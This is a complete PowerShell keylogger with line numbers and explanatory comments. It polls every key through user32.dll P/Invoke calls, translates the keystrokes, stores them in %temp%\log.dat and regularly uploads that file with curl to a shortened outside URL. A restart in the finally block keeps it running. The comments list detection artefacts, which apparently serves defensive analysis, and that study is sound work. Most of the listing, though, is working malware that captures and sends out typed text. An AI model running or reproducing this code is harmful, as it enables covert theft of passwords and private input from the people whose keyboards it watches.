# run-key: polls the keyboard through user32.dll P/Invoke calls, buffers the
# translated characters, appends them to %temp%\log.dat and periodically uploads
# that file with curl to the shortened URL further down (keystroke capture).
# Parameter $send: number of log flushes since the last upload; the function
# passes it back to itself when it restarts from the finally block.
# Observable artefacts for detection, all visible in this listing: Add-Type
# compiling user32 imports (GetAsyncKeyState / GetKeyboardState / MapVirtualKey /
# ToUnicode) from PowerShell, cmd.exe children of the PowerShell process,
# writes to %temp%\log.dat, and an outbound "curl -T" upload.
1function run-key([Int]$send)
2{
# C# P/Invoke declarations for the four user32.dll functions used below;
# the here-string is compiled by Add-Type.
3 $signatures = @'
4 [DllImport("user32.dll", CharSet=CharSet.Auto, ExactSpelling=true)]
5 public static extern short GetAsyncKeyState(int virtualKeyCode);
6 [DllImport("user32.dll", CharSet=CharSet.Auto)]
7 public static extern int GetKeyboardState(byte[] keystate);
8 [DllImport("user32.dll", CharSet=CharSet.Auto)]
9 public static extern int MapVirtualKey(uint uCode, int uMapType);
10 [DllImport("user32.dll", CharSet=CharSet.Auto)]
11 public static extern int ToUnicode(uint wVirtKey, uint wScanCode, byte[] lpkeystate, System.Text.StringBuilder pwszBuff, int cchBuff, uint wFlags);
12'@
# Compiles the signatures into the type API.Win32; -PassThru returns the type
# so its static methods can be called as $API::Name(...).
13 $API = Add-Type -MemberDefinition $signatures -Name 'Win32' -Namespace API -PassThru
# $counter: translated characters buffered since the last flush to disk.
# $end:     how many times the buffer was seen ending in "9"; 5 stops the loop.
# $lista:   in-memory buffer of translated characters.
14 [Int]$counter = 0
15 [Int]$end = 0
16 [String]$lista = ""
17 try
18 {
# Main polling loop; runs until the stop condition below has been hit 5 times.
19 while ($end -lt 5) {
# Poll roughly every 40 ms.
20 Start-Sleep -Milliseconds 40
# Check every virtual-key code from 9 to 254.
21 for ($ascii = 9; $ascii -le 254; $ascii++) {
22 $state = $API::GetAsyncKeyState($ascii)
# -32767 is 0x8001 as a signed 16-bit value: the key is down and was pressed
# since the previous GetAsyncKeyState call.
23 if ($state -eq -32767)
24 {
# Reads the Caps Lock state and discards the result.
25 $null = [console]::CapsLock
# Map type 3; the result is passed to ToUnicode as its scan-code argument.
26 $virtualKey = $API::MapVirtualKey($ascii, 3)
# Snapshot of the 256 virtual-key states; the return value is stored but never checked.
27 $kbstate = New-Object Byte[] 256
28 $checkkbstate = $API::GetKeyboardState($kbstate)
# Output buffer for the translated character(s).
29 $mychar = New-Object -TypeName System.Text.StringBuilder
30 # translate virtual key
31 $success = $API::ToUnicode($ascii, $virtualKey, $kbstate, $mychar, $mychar.Capacity, 0)
32
# Any non-zero ToUnicode return value is treated as a successful translation.
33 if ($success)
34 {
35 # add key to logger file
36 $lista += $mychar
37 $counter++
# Flush to disk every 20 translated characters.
38 if ($counter -ge 20)
39 {
40 $counter = 0
# PowerShell expands $lista into the cmd.exe command line, so the captured text
# is visible in process-creation telemetry that records command lines.
41 cmd.exe /c "echo $lista>>%temp%\log.dat"
42 $lista = ""
# Count flushes; every third flush triggers an upload.
43 $send++
44 if ($send -ge 3)
45 {
46 $send = 0
# curl -T uploads the log file; -L follows redirects (the target is a URL
# shortener, so the final destination is not visible in this listing) and
# -s suppresses curl's output.
47 cmd.exe /c "curl -T %temp%\log.dat -Ls https://bit.ly/3yPnegN"
# Overwrites the log file with a blank line after the upload.
48 cmd.exe /c "echo.>%temp%\log.dat"
49 }
50 }
# Stop condition: each translated key that leaves the buffer ending in "9"
# increments $end.
51 if ($lista.endswith("9"))
52 {
53 $end++
54 if ($end -ge 5)
55 {
# break leaves the for loop; the while condition then ends the polling loop.
56 break
57 }
58 }
59 }
60 }
61 }
62 }
63 }
# Runs on every exit from the try block, including errors and interruption.
64 finally
65 {
# If the stop condition was not reached, flush what is buffered and start the
# loop again, carrying the flush counter over.
66 if ($end -lt 5)
67 {
68 cmd.exe /c "echo $lista>>%temp%\log.dat"
69 $lista = ""
70 run-key $send
71 }
72 }
73}
# Script entry point: starts the capture loop with the flush counter ($send) at 0.
74run-key 0